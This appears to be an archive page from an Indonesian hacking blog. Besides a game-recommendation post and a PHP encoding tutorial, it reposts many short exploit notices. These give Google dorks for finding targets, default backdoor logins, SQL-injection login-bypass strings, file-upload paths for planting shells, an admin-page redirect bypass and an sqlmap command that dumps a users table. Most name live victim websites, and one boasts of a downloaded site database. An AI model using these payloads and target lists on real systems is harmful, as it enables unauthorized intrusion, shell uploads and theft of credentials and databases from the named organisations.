Langsung ke konten utama

Postingan

Menampilkan postingan dari Januari, 2018

Pinned Post

Rekomendasi Game Simulator Kendaraan 2020 yang Tak Kalah Seru dari Sebelumnya

Sekarang, banyak sekali jenis game online bertebaran. Mulai MMORPG sampai dengan Game Simulation atau yang lebih familiar dikenal game simulator. Belakangan yang banyak dimainkan adalah game simulator yang menawarkan pengalaman melakukan aktivitas dengan simulasi. Ada yang life-simulation games, vehicle simulation, dan masih banyak lagi lainnya. Tahun 2020 ini juga banyak bermunculan game simulator yang tidak kalah seru dari sebelum-sebelumnya. Bagi yang sedang mencari rekomendasi, berikut ini akan adalah daftar game simulator patut dicoba yang pertama, Bus Simulator Indonesia Pertama datang dari Tanah Air ada yang namanya Bus Simulator Indonesia atau biasa disingkat BUSSID. Game ini cocok sekali bagi yang ingin merasakan sensasi supir bus Indonesia apalagi bila menginstall mod yang didapat dari anonytun.com, di sana Anda bisa mendapatkan banyak pilihan bus, truk dan mobil yang seru secara gratis. A da simulasi bus antarkota, antarprovinsi,  bahkan antar pulau. Karena ada fi...

Encode dan Decode Script PHP

Encode dan Decode Script PHP Hae pengunjung setia All Tutor Cyber :v Kembali lagi sama admin gans GU3LT03M :v Udah lama ga posting sekarang admin mau share tutorial Encode dan Decode Script PHP. Pernah dengar kata Encode dan Decode kan? Apa itu Encode dan Decode? Encode =>  Menyandi script php menggunakan enkripsi tertentu dengan tujuan menyembunyikan source aslinya agar hanya satu atau beberapa orang saja yang mengetahuinya. dan Decode => Melihat source code dari script php yang telah diencode dengan sayarat mengetahui jenis encoding yang dipakai saat encode file. Cara Encode dan Decode Scriptnya simak dibawah : Bahannya tool Encode dan Decode : Disini   ( Jika link rusak atau butuh scnya harap lapor ke admin ya, disini ) Encode Script :  Jika udah ada script php yang ingin di encode, pisahkan dahulu tag  <?php  dan ?> dari dalam script yang akan di encode. Lalu masuk ke link tool Encode dan Decode tadi dan pastekan script yang akan...

Aonestar CMS BackDoor Vulnerability

Title : Aonestar CMS BackDoor Vulnerability Credit : MrHoudini Date : 9-1-2018 Dork : intext:"D & D by Aonestar" Username : admin Password : admin Sites : http://infodevvideo.co.uk/admin/ http://beaconhousenursing.co.uk/admin/ http://anayatfoundation.org/aytadmin/

K-LOANS 1.4.5 Backdoor account Vulnerability

============================================================================ | # Title : K-LOANS 1.4.5 Backdoor account Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 Français V.(Pro) | | # Version : v 1.4.5 | | # Vendor : https://codecanyon.net/item/loan-management-system/11454263| | # Dork : K-LOANS 1.4.5 | ============================================================================ poc : [+] Dorking İn Google Or Other Search Enggine [+] user : admin & pass = admin123 http://www.garciuz.com/prestar/index.php/home

Website Sekolah Gratis - Responsive FileManager

  # Exploit Title: Website Sekolah Gratis - Responsive FileManager # Google Dork: intext:"Setup by Website Sekolah Gratis." # Date: 28 December 2017 (Indonesia) # Exploit Author: AlHikam0x # Tested on: Ubuntu Proof of Concept 1. Responsive FileManager https://web-target/include/filemanager/dialog.php View Responsive FileManager : HERE 2. Upload Shell shell.php.fla and more. 3. Right click, Show URL https://web-target/files/shell.php.fla

Global Webmasters - Admin Panel Bypass

# Exploit Title: Global Webmasters - Admin Panel Bypass # Google Dork: intext:" by GlobalWebmasters" # Date: 30 December 2017 # Exploit Author: AlHikam0x # Vendor Homepage: https://www.sajtovi-izrada.com # Tested on: Ubuntu Proof of Concept 1. Login Admin Panel. https://web-target/admin or login , etc. 2. Input username and password (bypassing) Username: '=''or' Password: '=''or' I test it directly to the developer site, and the client site also has the same vulnerability. Development is Vulnerability! https://www.sajtovi-izrada.com/

雅风工作室 - Arbitrary File Upload

# Exploit Title: 雅风工作室 - Arbitrary File Upload # Google Dork: intext:"Htmcss.Com All Rights Reserved" # Date: 30 December 2017 # Exploit Author: AlHikam0x # Vendor Homepage: http://www.htmcss.com # Tested on: Ubuntu Proof of Concept 1. Check Vulnerability. https://web-target/tpl/plugins/upload9.1.0/server/php/ 2. Array type Upload : files[] 3. Check file uploaded. https://web-target/tpl/plugins/upload9.1.0/server/php/files/1234567_.php

Al3jeb v1.3 Auth by pass Vulnerability

| # Title : Al3jeb v1.3 Auth by pass Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 10 Français V.(Pro) | # Version : v1.3 | # Vendor : http://cs4pc.com/ | # Dork : n/a ======================================================================== poc : http://bahaa.e-hosttec.com/index.php user : 1'or'1'='1 Pass : 1'or'1'='1

Dimofinf CMS Arbitrary File Upload

# Exploit Title: Arbi Arbitrary File Upload Vulnerability # Google Dork: intext:" Powered by Dimofinf " # Date: 2017-12-20 # Author: Iran Anonymous # Tested on: Win 7, Linux *************************************************** # exploit => /editor/filemanager/connectors/uploadtest.html # Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html *************************************************** # Proof : http://www.arbi.ws//FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.arbi.ws///userfiles/Hack.txt =====================================================

softventurs Admin Page Noredirect

########################################################################### # Exploit Title: Admin Page Noredirect [softventurs] # Author : Magelang1337 # Google Dork 1 : Developed by Softventurs # Google Dork 2 : Designed By - softventurs # Google Dork 3 : Powered By - softventurs # Vendor Home: http://www.softventurs.in # Tested On Mozilla Firefox ########################################################################### Tutorial : [+] Download Addons "Noredirect" [Mozilla] [+] insert admin page >> http://gauravbooks.com/admin/ to Addons Mozilla [Noredirect] [+] Open new tab on Mozilla >> http://gauravbooks.com/admin/main.php Demo : http://gauravbooks.com/admin/ http://www.chaperonbiotech.com/admin/ http://www.rataniti.com/admin/ http://garimaprakashan.com/admin/ http://www.baradeviiti.org/admin/ http://deltinlaboratories.com/admin/ http://www.paradisepublicschool.co.in/admin/ http://chandralokprakashan.com/admin/ http://www.sagimetalbox.com/admin/ http://times...

United Arab Network (Fckeditor) Arbitrary File Upload Vulnerability

# Exploit Title: United Arab Network (Fckeditor) Arbitrary File Upload Vulnerability # Google Dork: intext:" Powered by Dimofinf cms Version 4.0.0 " # Date: 2017-12-20 # Author: Iran Anonymous # Tested on: Win 7, Linux # exploit => /editor/filemanager/connectors/uploadtest.html # Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html *************************************************** # Proof : http://www.arbi.ws//FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.arbi.ws///userfiles/Hack.txt ***************************************************  # We have downloaded the database for this site for you : http://www.arbi.ws//arbi.zip

2X TEKNOLOJİ auth by pass vulnerability

======================================================================== | # Title : 2X TEKNOLOJİ auth by pass vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version : V 2 | # Vendor : http://2xteknoloji.com/ | # Dork : Design By 2X TEKNOLOJİ ======================================================================== poc : user : 1'or'1'='1 pass : 1'or'1'='1 Login : http://oresvinc.com/panel/proje.php

2X Ajans auth by pass vulnerability

======================================================================== | # Title : 2X Ajans auth by pass vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 8.1 Français V.(Pro) | # Version : V 2 | # Vendor : http://www.2xajans.com/ | # Dork : Design by 2X Ajans ======================================================================== poc : http://www.2xajans.com/panel/ user : 1'or'1'='1 Pass : 1'or'1'='1

IIS Group Admin Panel Bypass And Sql İnjection Vulnerability

# Exploit Title: IIS Group Admin Panel Bypass And Sql İnjection Vulnerability # Author : TrazeR & Sipahiler & TurkZ.org # Google Dork : intext:"Powered by IIS Group" # Tested on : Kali Linux 2017 Chrome, Firefox # Date : 20.12.2017 # Vendor Home: http://www.iisgroup.co.za/ # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Open Target [+] /admin/ [+] /admin/login.asp [+] Sql GET parameter 'cat' is vulnerable Video: https://youtu.be/YhGVu5wTtrQ  Command:root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.deville.co.za/products.asp?cat=35" -T users -C id,name,pw --dump  Parameter: cat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=35 AND 83...